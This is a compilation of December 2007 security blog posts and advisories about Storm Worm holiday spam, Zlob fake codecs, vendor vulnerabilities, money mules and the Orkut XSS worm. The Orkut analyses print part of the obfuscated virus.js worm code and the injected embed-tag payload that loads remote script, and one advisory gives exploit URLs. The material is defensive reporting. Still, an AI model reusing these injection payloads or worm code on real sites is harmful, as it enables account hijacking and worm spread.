Chris Mosby at myITforum.com

Is that really you, Santa?

Look, here comes Santa...on his sleigh with Rudolph the red-nosed reindeer and a computer. This year, he seems to have decided to distribute free gifts through email...but with a catch.

An email that contains a link to a malicious file reportedly arrives as the following:
Subject: Seasons Greetings
Message Body:

listen up,

This Christmas, we want to show you something you will really enjoy.
This might not be fun for the whole family, but I bet you'll like it come one take 2 min and check it out.
hxxp://merrychrist[REMOVED]

If you click on the links, you will find pictures of women dressed as "Mrs. Clause" on the site and the malicious file stripshow.exe, which is a new variant of Trojan.Peacomm.D,
will be downloaded if you click on the picture.

Once it runs, you will be rewarded with malicious gifts for free!! As we have warned in the past, users are taking serious risks when being enticed by free stuff available on the Internet. Always keep your antivirus software up-to-date and follow safe computing practices.

Happy holidays!!

Posted by Shunichi Imano on December 23, 2007 08:48 PM

Source: Symantec Security Response Weblog: Is that really you, Santa?

It's a Stormy Christmas Eve..
Posted by Esz @ 08:54 GMT |

---

So, we were wrong. It turns out that the Storm gang was going to do a Christmas Malware run after all, they just decided to start it surprisingly late - on Christmas eve itself!
There's been a series of spam messages redirecting traffic to malicious site merrychristmasdude.com. This site contains a new version of the Storm Worm. The IP address of the site changes every second. We also already detect it earlier as Email-Worm.Win32.Zhelatin.pd
Here are the Screen shots of the site:


Don't be naughty and go wondering to that domain. Please do not click on the "Download For Free Now" button as it will get you infected. Merry Christmas, y'all!

Source: It's a Stormy Christmas Eve.. - F-Secure Weblog : News from the Lab

Anticipated Storm-Bot Attack Begins

Published: 2007-12-24,
Last Updated: 2007-12-24 13:11:38 UTC
by Kevin Liston (Version: 3)

Overview and Blocking Information

Shortly after 0000 GMT 24-DEC-2007 reports came in indicating that the Storm Botnet was sending out another wave of attempts to enlist new members.  This version is a Christmas-themed stripshow directing victims to merrychristmasdude.com.

The message comes in with a number of subjects:

Subject: I love this Carol!
Subject: Santa Said, HO HO HO
Subject: Christmas Email
Subject: The Perfect Christmas
Subject: Find Some Christmas Tail
Subject: Time for a little Christmas Cheer

Updated subjects:
“Merry Christmas To All”
“Warm Up this Christmas”
“Mrs. Clause Is Out Tonight!”
“The Twelve Girls Of Christmas”
“Jingle Bells, Jingle Bells”
“Cold Winter Nights”

The body is something similar to:

do you have a min?



This Christmas, we want to show you something you will really enjoy. Forget all the stress for two min and feast your eyes on these.  ;-) 

http://merry christmasdude.com/

[the domain was interrupted for your protection]

Thanks Kevin for the initial report.

I recommend that you apply blocks on that domain (merrychristmasdude.com) for both outbound HTTP requests and incoming emails.

Under The Hood

The domain appears to be registered through nic.ru and hosted on a fast-flux network of at least 1000 nodes.  Like previous Storm waves, the binary changes approximately every 15 minutes; supposedly updating the peer-list used by the P2P network that the bot-net uses for command and control.

Russ has a nice and tidy analysis available at: http://holisticinfosec.blogspot.com/2007/12/storm-bot-stripshow-analysis.html

Speaking of Blogspot

If you google for merrychristmasdude.com you'll see a number of spam blogs set up with that domain in their body and directing traffic to siski.cn (take a look for that in your proxy logs while you're at it.)

Visiting skiski.cn will redirect you over to shockbabetv.com and attempt to install a fake video codec, which itself appears to be a downloader to deliver more coal to your stocking.

---

Kevin Liston (kliston -at- isc.sans.org)

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

MS07-069 - Post install issue

Published: 2007-12-19,
Last Updated: 2007-12-21 05:09:23 UTC
by Stephen Hall (Version: 2)

We have been working with Microsoft and a couple of our readers on an issue they have been having with MS07-069 and IE crashing after the roll up patch for IE has been installed.

Well the Microsoft MSRC have updated their blog and there is a KB article which provides a workaround.

So if you have a customised installation and have been having IE issues since MS07-069, this could be your solution.

UPDATE

Microsoft has released an update to fix this problem.  You can find it here. (thanks Susan).

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Google Toolbar Custom Button Installer Dialog Spoofing Weakness

Secunia Advisory:
SA28166

Release Date:
2007-12-21

Critical:

Less critical

Impact:
Spoofing

Where:
From remote

Solution Status:
Unpatched

Software:
Google Toolbar 1.x
Google Toolbar 2.x
Google Toolbar 3.x
Google Toolbar 4.x

 

Description:
Aviv Raffon has discovered a weakness in Google Toolbar, which can be exploited by malicious people to conduct spoofing attacks.

The weakness is caused due to an error when handling domains that are being displayed in the Custom Button Installer dialog. This can be exploited to spoof the origin of a custom button and the domain information in the "privacy considerations" section via a specially crafted xml file in combination with a redirector page.

The weakness is confirmed in Google Toolbar version 4.0.1601.4987 for Internet Explorer. Other versions may also be affected.

Solution:
Do not rely on information in the Custom Button dialog when installing custom buttons.

Provided and/or discovered by:
Aviv Raffon

Original Advisory:
http://aviv.raffon.net/2007/12/18/GoogleToolbarDialogSpoofingVulnerability.aspx

Source: Google Toolbar Custom Button Installer Dialog Spoofing Weakness - Advisories - Secunia

Comcast starts blocking email willy-nilly

Spam voting

By Nick Farrell: Friday, 21 December 2007, 10:21 AM

A NEW feature on Comcast which blocks email identified as spam has been causing merry hell.

In the good old days if two people decide that an email from an outfit is spam, that email will go into the junk mailbox if it appears anywhere else.

Writing in his bog, one angry customer said that recently Comcast has upped the ante and will block all email from the offending server.

The punter works for a news site and says that Comcast users that have requested daily news emails from the site and are being denied email they have asked for.

He had tried to get Comcast to look at the problem, but the outfit did not seem particularly interested. Loyal readers of the news site who have complained that their news is not being delivered have also complained and been ritualistically ignored.

After much shouting Comcast has lifted the block on the IP range. But this seems to be a problem with several US ISPs. For example, one ISP in Florida and another in California are convinced that every email from Bulgaria must be spam and is refusing to receive mail with a .bg ending.

Ironically the same mail sent from yahoo.com gets through. µ

• Home
• Discuss on our Forum
• Flame Author

Source: Comcast starts blocking email willy-nilly - The INQUIRER

Is Trojan.Zlob Getting Honest? Naaahh...

New fake codec Web sites often appear out of nowhere (we are pretty used to seeing them) and in most cases if you download and run the "codec" you get infected with a variant of Trojan.Zlob. Nothing new, but this time I found something different. I was testing a fake codec Web site when I came upon a new variant. The installation step is the usual:

Figure 1: Standard installation process

However, after that the browser is started with a Google search for the word “sex.” The interesting stuff is that while browsing, you will now be frequently faced with this popup:

Figure 2: Frequently recurring message box

Well, I really appreciate the honesty of Zlob telling me I was infected! Clicking the OK button will force the download of “IE Defender,” which is an antispyware application. (IE Defender is also a potentially unwanted application. It is a wannabe malware scanner that is used in conjunction with the Zlob threat. You can find more details about IE Defender in the related write-up here.)

Of course, it’s not over yet. The Zlob also installs a browser helper object (BHO – a module for Internet Explorer, used to integrate added functionality) in order to show the previously mentioned popup during Web browsing. A quick analysis of the BHO revealed some other interesting features. It is capable of hijacking Google results and redirecting them to IE Defender Web site:

Figure 3: Google search reports a fake error box and a link to pornographic content

A fake error box is shown in the Google results, as well as a link to a pornographic video on YouTube. This is supposed to panic the user, because most users wouldn't want someone else using his or her computer for an innocent Google search and then find a link to pornographic content in the search results. (Incidentally, you might notice that the search word I used was "potato.”) Clicking the error box will bring the user to the IE Defender Web site.

If the annoying popup was not enough, surely an error message from Google will make you think twice about the potential dangers! We know very well how these threats can spoof legitimate Web sites or security products in order to convince a user to buy their own security applications. Google is not the only one being targeted. Further analysis reveals that Yahoo is also supposedly reporting the same behavior:

Figure 4: Yahoo search shows a fake error box

Not only do you see a fake error box in the search results, but also the first legitimate result is hijacked so that if it is clicked it will redirect the user to the IE Defender fake online scan Web site. Also, Live Search is not immune:

Figure 5: A legitimate search result in Live Search has been redirected

In this case there are no fake error boxes shown in the search results, but the first legitimate result entry is hijacked in order to point to the IE Defender Web site. In addition, the MySpace and MSN Web sites are targeted with the same technique.

Interestingly, if you decide to download IE Defender and run a scan, it will actually detect the Zlob infection. Of course you have to pay if you want to clean up the reported infection. So it looks like that Zlob is really kind: after infecting your system it will reveal that your system is infected. Then it tries to redirect you to a Web site where you can download antispyware software that is supposedly able to remove it (for only $38.95 USD). What a lovely Trojan! I didn't actually purchase the IE Defender software, because it would probably do more harm than good. I'd rather let my Symantec products (with the latest definitions, of course) take care of the antispyware work!

Posted by Andrea Lelli on December 21, 2007 05:00 AM

Source: Symantec Security Response Weblog: Is Trojan.Zlob Getting Honest? Naaahh...

Secunia Advisory:
SA28177

Release Date:
2007-12-20

Critical:

Less critical

Impact:
Manipulation of data

Where:
From remote

Solution Status:
Unpatched

Software:
HP Software Update 3.x

Description:
porkythepig has reported a vulnerability in HP Software Update, which can be exploited by malicious people to overwrite arbitrary files on a user's system.
The vulnerability is caused due to the HPRulesEngine.ContentCollection.1 ActiveX Control (RulesEngine.dll) including the insecure "SaveToFile()" method, which writes to a file specified as an argument. This can be exploited to overwrite and corrupt arbitrary files on the system in the context of the currently logged-on user.
The vulnerability is reported in version 3.0.8.4. Other versions may also be affected.
Solution:
Set the kill-bit for the affected ActiveX control.
Provided and/or discovered by:
porkythepig
Original Advisory:
http://www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt

Source: HP Software Update ContentCollection Class ActiveX Control Insecure Method - Advisories - Secunia

********************************************************************

Title: Microsoft Security Bulletin Minor Revision

Issued: December 20, 2007

********************************************************************

Summary

=======

The following bulletin has undergone a minor revision increment.

Please see the appropriate bulletin for more details.

* MS07-069 - Critical

Bulletin Information:

=====================

* MS07-069 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-069.mspx

- Reason for Revision: Bulletin revised to reflect a new Security Update FAQ entry for a known issue documented in KB946627.

- Originally posted: December 11, 2007

- Updated: December 20, 2007

- Bulletin Severity Rating: Critical

- Version: 1.3

Rootkits in China Part 1

Thursday December 20, 2007 at 9:52 am CST
Posted by Xing Su

Trackback

The term “rootkit” was originally used to refer to toolkits used by root privileged users. This definition has evolved over time. Nowadays, the term rootkit refers to backdoor programs that run with elevated privileges and that are designed to evade detection by users, administrators and rootkit detection software. Rootkits first appeared in China in 2001 and have evolved substantially since then.

These days most rootkits are installed through exploitation of web browser vulnerabilities or from the infection of viruses and worms. In some cases, rootkits are bundled with images that exploit image library flaws to gain access to systems. In other cases, exploits for previously unknown vulnerabilities (zero-day) are placed on web sites and used to hack browsers and install rootkits. For example, exploits for the zero-day vulnerability identified by CVE-2007-0038 were found on many Chinese websites several months before a patch was released. In other cases, popular websites and public forums are hacked. Their content is then modified to include exploits that install rootkits on to user systems. Often, attackers exploit script injection vulnerabilities to gain access to these web sites. They then upload exploits for known issues like MS06-001, MS06-014, MS06-055, MS07-017, Baofeng ActiveX vulnerability, RealPlayer ActiveX vulnerability and so on. In China, many rootkits also spread via malware that targets a popular IM client named QQ. Once a QQ user’s machine has been compromised by a rootkit, it will send messages containing links to malicious websites to all of the friends of the affected QQ user. If these users click the links, they too will be targeted. This method of propagation is widespread and difficult to defend against. Another technique used to spread rootkits includes the addition of malicious programs to pirated software like Windows, Photoshop, Office, etc. People who download and install these pirated programs are infected by the rootkits bundled with them. Since pirated software is popular in China, many machines are infected this way.

Stay tuned for Part 2…..

References:

Rootkit Paper 1
Rootkit Paper 2

Source: Computer Security Research - McAfee Avert Labs Blog

Pinch Malware Authors Busted
Posted by Alexey @ 16:30 GMT |

---

Nikolay Patrushev, head of the Russian FSB (Federal Security Agency), recently announced that over 1.4 million hacker attacks against federal sites were repelled in just 2007.
Patrushev also stated that the authors of the famous Pinch trojan (known as LdPinch, PdPinch) have been identified and are now awaiting trial. Pinch production has been done in a very professional manner with the authors creating easy-to-use tools to quickly get stolen information from infected computers.
The two malware authors are reported to be Russian citizens Ermishkin and Farhutdinov. According to some reports, Pinch-based malware has infected tens of millions of personal computers worldwide. The financial losses due to Pinch infections can hardly be calculated.

See Patrik's earlier post for more details on some of the tools used.

Source: Pinch Malware Authors Busted - F-Secure Weblog : News from the Lab

The Orkut Worm Has Landed!

Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users' systems were infected. The exploit was contained in a JavaScript file, aptly named "virus.js" file, which was injected using an embed tag. Here is a snippet of the JavaScript file:

function $(p,a,c,k,e,d) {
 e=function(c) {
  return(c35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
 while(c--){d[e(c)]=k||e(c)}
 k=[function(e){return d}];
 e=function(){return'\\w+'};
 c=1
};
while(c--){
 if(k){
  p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k)
 }
 }
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];
7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?";
m="+m.2f():"")+(c?";
c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);
6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?";
9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);
3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));
f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&
15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);
3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
…


We can see from the above code that the JavaScript is heavily obfuscated. After decoding and analyzing the strings in the script we confirmed that it is indeed targeting Orkut users. Our analysis of the decoded JavaScript showed that when the virus.js script is executed it forces the user to join a community called “Infectados pelo Vírus do Orkut”. The name of this community is in Portuguese and translates to “Infected by Virus Orkut.”

This is a novel way for the author of the worm to keep track of accounts infected by the worm. The script then loads the "friends list" of the infected Orkut account and sends them a malicious scrap. The worm uses Orkut scrap entries as its vector of propagation. Below is an example of the code to define the Orkut scrap:

2008 vem ai… que ele comece mto bem par avc
<br/>
[silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver]
<br/>
<embed src=http://www.orkut.com/LoL.aspx type=
“application/x-shockwave-flash” wmode=”transparent’);
Script=document.createElement(‘script’);
Script.src=’http://files.myopera111.com/[REMOVED].js’;
Document.getElementByTagname(‘head’)[0].appendChild
(script);escape(‘” width=”1” height=”1”>
</embed>


When you look at the code there are a few attributes for the embed tag, such as wmode, width, height, etc. The embed tag expects these attributes in order to create a flash object to display the flash content. Now when you look closely at the code, notice the wmode attribute:

wmode=”transparent’);

The author has closed wmode with ‘); and has added some script code in the attribute value itself. Let’s analyze this further. We tested the script with a variant of the malicious scrap:

“<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent” width=”1” height=”1”>”.

When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:

<script type="text/javascript">
var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx',
   '337533968', '1', '1', '9', '#FFFFFF',
   'autohigh', '', '', '337533968');
flashWriter._addParam('wmode', 'transparent');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
flashWriter._setAttribute('style', '');
flashWriter._write('flashDiv337533968');</script>


The Orkut application parsed the scrap text and created the flash object with values specified in the scrap.
If we look at the source code of the malicious scrap it looks like the below sample (the injected code is marked in bold and red). Note the escape function is added to allow the malicious code to be integrated:

flashWriter._addParam ( 'wmode', 'transparent');
script = document.createElement ( 'script');
script.src = 'http://files.myopera.com/virusd[REMOVED]';
document.getElementsByTagName ( 'head') [0]. AppendChild script);
escape ('');
flashWriter._addParam ( 'allowNetworking', 'internal');
flashWriter._addParam ( 'allowScriptAccess',' never ');


Based on what we seen so far we can infer that the Orkut application filters failed to parse this attribute in the request. It took the whole wmode value as is and added it in the rendering code:

flashWriter._addParam('wmode', 'transparent'); (malicious script)

In this way the worm inserts a malicious script using the embed tag and uses it for exploitation. Interestingly, a victim doesn’t need to click on the scrap. When the scrapbook is loaded the malicious embed flash code loads the virus.js file silently. The JavaScript takes the cookies and tokens of the logged in user and uses it to spread the worm further.

This worm illustrates how a simple script injection exploit could affect a large social networking site. Remember, users didn’t have to click anything as the malicious script runs silently as soon as the page is loaded. This worm could have been used for other malicious purposes, such as stealing cookies, exploiting other vulnerabilities, or stealing sensitive data as well.

As of today, the virus.js script is no longer available on the site and it seems as if there have been adequate checks implemented by Orkut to validate content when posting a scrap. The malicious scraps have also been deleted from the scrapbook of the infected users.

Symantec has built a number of excellent Web browsing protections into our 2008 product range.
The worm is detected by Symantec's antivirus products with certified definitions of 12/19/2007 rev. 7 and greater as JS.Woorkut. We recommend that you keep your Symantec products up-to-date, patch your systems, and run your browser with limited options enabled.

Posted by Umesh Wanve on December 20, 2007 08:30 AM

Source: Symantec Security Response Weblog: The Orkut Worm Has Landed!

The darker side of online virus scanners

Aleks
December 20, 2007 | 15:47  GMT

comment

Online antivirus services such as VirusTotal (www.virustotal.com) and VirusScan (http://virusscan.jotti.org) have been around for a few years now. Services like this mean that any user can scan a suspicious file for malicious code online. These services differ from the online scanners offered on antivirus vendor sites by scanning files with several antivirus products simultaneously. For instance, VirusTotal currently uses 32 antivirus products to check suspicious files!

But as so often happens, something that can be used for good – helping users check the integrity of their files – can also be used by virus writers. They quickly caught on to the fact that services like the ones mentioned above could be used to test how well their creations can evade popular antivirus solutions. If a new Trojan or worm can be detected by an antivirus, the author will deliberately modify it until it isn't detected any more. The result? The heuristics used in the vast majority of antivirus products are helpless when confronted by such carefully prepared malicious programs.

By default, VirusScan, VirusTotal and other services send all suspicious files to antivirus companies. If a file is detected by, say, 10 antivirus products, and the other 22 don't detect it, the file will be sent to the 22 relevant virus labs for analysis and to be added to the antivirus database. This significantly reduces the time taken by antivirus companies to react during epidemics and also increases the overall detection rate. If the user doesn't want a file to be sent to the antivirus company, then s/he has to disable this option when scanning the file.

However, there's a rumour in virus writing circles that all files are sent to virus labs, regardless of whether or not the option is enabled. Cyber criminals are now offering a solution for the tin-foil hat brigade – similar services designed expressly for virus writers. You have to pay to use the service, but there's a guarantee that no file will be sent to an antivirus company.

One example is AvCheck.ru. The creators of this site offer to scan files using 15 antivirus programs and 'guarantee privacy for you and your files'. Of course they want money for it – a dollar per file.

We can only admire the entrepreneurial spirit behind this site. But we're not going to wish them success. And after all, the site could be closed at any moment, and a court case could be raised against the creators of the site by the antivirus companies whose products are being used in clear violation of license agreements.

Source: Viruslist.com - Analyst's Diary

Cisco Firewall Services Module Denial of Service Vulnerability

Secunia Advisory:
SA28175

Release Date:
2007-12-20

Critical:

Moderately critical

Impact:
DoS

Where:
From remote

Solution Status:
Vendor Workaround

Software:
Cisco Firewall Services Module (FWSM) 3.x

CVE reference:
CVE-2007-5584 (Secunia mirror)

Description:
A vulnerability has been reported in the Cisco Firewall Services Module (FWSM), which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an unspecified error in the processing of data in the control-plane path with Layer 7 Application Inspections. This can be exploited to cause a crash and reload the FWSM via specially crafted network traffic.

The vulnerability is reported in FWSM System Software version 3.2(3).

Solution:
Update to FWSM software version 3.2(4) (available approximately 2007-12-31).

Apply vendor workaround (see vendor advisory for details).

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml

Source: Cisco Firewall Services Module Denial of Service Vulnerability - Advisories - Secunia

Orkut XSS Worm

Published: 2007-12-19,
Last Updated: 2007-12-19 17:57:39 UTC
by Tom Liston (Version: 1)

A vulnerability in the social networking site Orkut that allowed users to inject HTML and JavaScript into their profiles set the stage for a persistent XSS worm that appears to have affected approximately 400,000 Orkut users.  The malicious code is apparently fetched from the site "http://files.myopera.com" and is called, conveniently enough, "virus.js."

1 comment(s)

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Adobe Flash Player Multiple Vulnerabilities

Secunia Advisory:
SA28161

Release Date:
2007-12-19

Last Update:
2007-12-20

Critical:

Highly critical

Impact:
Unknown
Security Bypass
Cross Site Scripting
Manipulation of data
Exposure of sensitive information
Privilege escalation
DoS
System access

Where:
From remote

Solution Status:
Vendor Patch

Software:
Adobe Flash CS3
Adobe Flash Player 9.x
Adobe Flex 2.x
Macromedia Flash 8.x
Macromedia Flash Player 7.x
Macromedia Flash Player 8.x

CVE reference:
CVE-2007-4324 (Secunia mirror)
CVE-2007-4768 (Secunia mirror)
CVE-2007-5275 (Secunia mirror)
CVE-2007-5476 (Secunia mirror)
CVE-2007-6242 (Secunia mirror)
CVE-2007-6243 (Secunia mirror)
CVE-2007-6244 (Secunia mirror)
CVE-2007-6245 (Secunia mirror)
CVE-2007-6246 (Secunia mirror)

Description:
Some vulnerabilities have been reported in Adobe Flash Player, where one vulnerability has an unknown impact and others can be exploited by malicious, local users to gain escalated privileges and by malicious people to bypass certain security restrictions, conduct cross-site scripting and HTTP request splitting attacks, disclose sensitive information, cause a Denial of Service (DoS), or to potentially compromise a user's system.

1) An error when parsing specially crafted regular expressions can be exploited to cause a heap-based buffer overflow.

For more information see vulnerability #7 in:
SA27543

2) An error exists in the processing of SWF embedded JPG images. This can be exploited to corrupt the heap via specially crafted X and Y densities specified in the JPG header.

3) An error exists when pinning a hostname to an IP address. This can be exploited to conduct DNS rebinding attacks via allow-access-from elements in cross-domain-policy XML documents.

4) An error exists in the enforcing of cross-domain policy files. This can be exploited to bypass certain security restrictions on web servers hosting cross-domain policy files.

5) Input passed to unspecified parameters when handling the "asfunction:" protocol is not properly sanitised before being returned to the user. This can be exploited to inject arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerability does not affect Flash Player 7.

6) An error exists within the processing of the "navigateToURL" function. This can be exploited to execute arbitrary script code in the security context of another domain via a specially crafted "javascript:" URI.

The vulnerability only affects the Flash Player ActiveX Control for Internet Explorer.

7) An unspecified error can be exploited to modify HTTP headers and conduct HTTP request splitting attacks.

8) An error within the implementation of the Socket or XMLSocket ActionScript classes can be exploited to determine if a port on a remote host is opened or closed.

9) An error within the setting of memory permissions in Adobe Flash Player for Linux can be exploited by malicious, local users to gain escalated privileges.

10) An unspecified error exists in Adobe Flash Player and Opera on Mac OS X.

For more information see vulnerability #3 in:
SA27277

The vulnerabilities are reported in versions prior to 9.0.115.0.

Do you have this product installed on your home computer? Scan using the free Personal Software Inspector or Online Software Inspector. Check if a vulnerable version is installed on computers in your corporate network, scan using the Network Software Inspector.

Solution:
Update to version 9.0.115.0.

Flash Player 9.0.48.0 and earlier for Windows, Mac, and Linux:
http://www.stage.adobe.com/go/getflash

Flash Player 9.0.48.0 and earlier - network distribution:
http://www.stage.adobe.com/licensing/distribution

Flash CS3 Professional:
http://www.adobe.com/support/flash/downloads.html

Flex 2.0:
http://www.stage.adobe.com/support/flashplayer/downloads.html#fp9

NOTE: This is reportedly the final security bulletin that Adobe will supply for users of Adobe Flash Player 7 (formerly Macromedia Flash Player 7).

Provided and/or discovered by:
1) The vendor credits Tavis Ormandy and Will Drewry of the Google Security Team.
2) Aaron Portnoy of TippingPoint DVLabs.
3) The vendor credits Dan Boneh, Adam Barth, Andrew Bortz, Collin Jackson, and Weidong Shao of Stanford University.
4, 7) Toshiharu Sugiyama of UBsecure, Inc. and JPCERT/CC.
5) The vendor credits Rich Cannings of the Google Security Team.
6) Collin Jackson and Adam Barth of Stanford University.
9) The vendor credits Jesse Michael and Thomas Biege of SUSE.
10) The vendor credits Opera.

Changelog:
2007-12-20: Updated advisory with additional information. Added link to US-CERT. Updated "Original Advisory" section.

Original Advisory:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb07-20.html

TippingPoint DVLabs:
http://dvlabs.tippingpoint.com/advisory/TPTI-07-21

JVN:
http://jvn.jp/jp/JVN%2345675516/index.html
http://jvn.jp/jp/JVN%2350876069/index.html

Stanford:
http://crypto.stanford.edu/advisories/CVE-2007-6244/

Other References:
SA27543:
http://secunia.com/advisories/27543/

SA27277:
http://secunia.com/advisories/27277/

US-CERT VU#758769:
http://www.kb.cert.org/vuls/id/758769

Source: Adobe Flash Player Multiple Vulnerabilities - Advisories - Secunia

WordPress Draft Information Disclosure

Secunia Advisory:
SA28130

Release Date:
2007-12-19

Critical:

Less critical

Impact:
Security Bypass
Exposure of sensitive information

Where:
From remote

Solution Status:
Unpatched

Software:
WordPress 2.x

Description:
Michael Brooks has discovered a vulnerability in WordPress, which can be exploited by malicious people to bypass certain security restrictions and to disclose sensitive information.

The application does not properly restrict access to posted drafts to users with valid administrator credentials. This can be exploited to read drafts by accessing the index.php script with data in the "PATH_INFO" URL part ending with "wp-admin/".

Examples:
http://[host]/[path]/index.php/wp-admin/
http://[host]/[path]/index.php/test-wp-admin/

The vulnerability is confirmed in version 2.3.1. Other versions may also be affected.

Solution:
Do not post sensitive information as drafts.

Provided and/or discovered by:
Michael Brooks

Source: WordPress Draft Information Disclosure - Advisories - Secunia

Red Cross money mule recruitment
Posted by Mikko @ 20:43 GMT |

---

Money mule recruitment is getting more and more blatant. We just ran across a spam run that uses Red Cross as the lure to recruit people for money laundering.
Example below (emphasis ours):

From: American Red Cross (glurp@sxhighway.gov.cn)
Subject: Red Cross and its new Projects in Europe. Join now!
American Red Cross Donation Department is looking for new partners in European region.
With over 30 million US dollars offered as charity funds for for EU Projects, American Red Cross Charity Department needs more employees in European Union.
The vacancy available at the moment is "Donation Collector"
Since we receive regular moneyed assistance for our Organisation in checks, money orders, bank wire transfers and even in gifts, be aware that "Donation Collector's duties would include regular cooperation with our Financial Department. Every day we receive a great deal of contribution from thousands of people, but unfortunately do not have enough employees to guarantee that these donations are contributed to the purpose they were meant for in the very beginning of our program.
"Donation Collector" together with our financial missionaries in different regions of EU receives and sends donations to the people in need and furthermore is committed to minimise the chances of any unsolicited use of these funds by any other third party.
The vacancy is not a non-profit work. Regular monthly salary of 2500 EUR is paid in the end of every working month.
If you have what it takes to be successful in this job, and are interested in the career with real career growth, promotion chances, then apply online, send to HR DEPARTMENT (link to a Yahoo email address)

Source: Red Cross money mule recruitment - F-Secure Weblog : News from the Lab

Arrested mules
Posted by Patrik @ 04:20 GMT |

---

Over the last few days we've done a few posts on money mules and today it was announced that the Dutch police have arrested 14 suspected money mules for money laundry. The mules had received money from phishing scams targeting ABN AMRO using servers in Hong Kong and forwarded the money to Russia and other countries.

This is the thing if you sign up for one of these money mule jobs. The money trail leads to you, not the perps ending up with the money. Don't do it.
Full story here

Source: Arrested mules - F-Secure Weblog : News from the Lab

Worm on Google's Orkut
Posted by Mikko @ 14:46 GMT |

---

Google's Orkut social networking site has been hit by a web worm.
This one used a vulnerability in the "scrapbook" feature of the site. It infected almost 400,000 accounts before it was shut down by removing a download file it needed to operate.

More information here and here and, hopefully soon, also at the official Orkut blog.

Source: Worm on Google's Orkut - F-Secure Weblog : News from the Lab

Orkut spam worm spotted!

Wednesday December 19, 2007 at 1:25 pm CST
Posted by Vinay Mahadik

Trackback

I analyzed some suspicious scrap “2008 vem ai… que ele comece mto bem para vc” from a bunch of friends on Orkut. For a while it was all over Orkut!! Translated to English, it reads “2008 is coming…I wish that it begins quite well for you”.

The HTML source of the scrapbook gives:

script type=”text/javascript” var flashWriter = new _SWFObject(’http://www.orkut.com/LoL.aspx’, ‘408030725′, ‘1′, ‘1′, ‘9′, ‘#FFFFFF’,
‘autohigh’, ‘’, ‘’, ‘408030725′);
flashWriter._addParam(’wmode’, ‘transparent’);
script=document.createElement(’script’);
script.src=’http://files.[REMOVED].com/virusdoorkut/files/virus.js’;
document.getElementsByTagName(’head’)[0].appendChild(script);
escape('’); flashWriter._addParam(’allowNetworking’, ‘internal’);
flashWriter._addParam(’allowScriptAccess’, ‘never’);
flashWriter._setAttribute(’style’, ‘’);
flashWriter._write(’flashDiv408030725′);
/script

When an Orkut user receives this malicious scrap, the browser downloads and executes the embedded virus.js script. It seems to do at least 2 things (it’s obfuscated and compacted, and I am writing this without any detailed analysis of the script so far) - scrap your friends with the same virulent message, and add your account to an Orkut community “Infectados pelo Vírus do Orkut” (”Infected by Orkut Virus” in English) created by the script author:

http://www.orkut.com/Community.aspx?cmm=44001818

A more detailed review of W32/KutWormer can be found in the Avert Labs Threat Library here.

As of the time of this writing, it had about 400,000 members (victims of this spam-worm). Apart from this, the worm doesn’t seem to affect your machine in any way. As I am writing this blog, I have seen the scraps disappearing so it looks like Orkut/Google are fighting back.

This clearly illustrates the issue with allowing rich-content on social/professional networking sites, and not sanitizing it enough. The ability to add Flash/Javascript content to Orkut scraps was only recently introduced.

Source: Computer Security Research - McAfee Avert Labs Blog

Orkut/Google Worms Compromise Over 400,000 Accounts

December 19th, 2007 by Robert McArdle

There appears to be a Web worm that has replicated at an alarming rate through Google’s Orkut social network in the last few hours.

Infection starts when the user is sent an email telling them that they have a new Scrapbook entry (essentially a guestbook). Upon visiting their page the user sees the text:

“2008 vem ai… que ele comece mto bem para vc”

No interaction is necessary; simply looking at the scrap starts the infection sequence. The scrap deletes itself, and the user is added to the Orkut Community “Infectados pelo Vírus do Orkut.” It then downloads and executes a heavily obfuscated JavaScript from http://files.myopera.com/virusdoorkut/[REMOVED]/virus.js, which in turns sends a copy of the original Scrapbook post to all of the user’s Orkut Contacts, so that they too will be infected by the threat.

At last count the group had over 400,000 users who had been infected. A Google translation of the description of the groups reads:

“CALMA!

If you came into this community, make sure that no data was stolen and not your will, that is not my goal.

If I are sure at the end of all, this community should is lotada of people

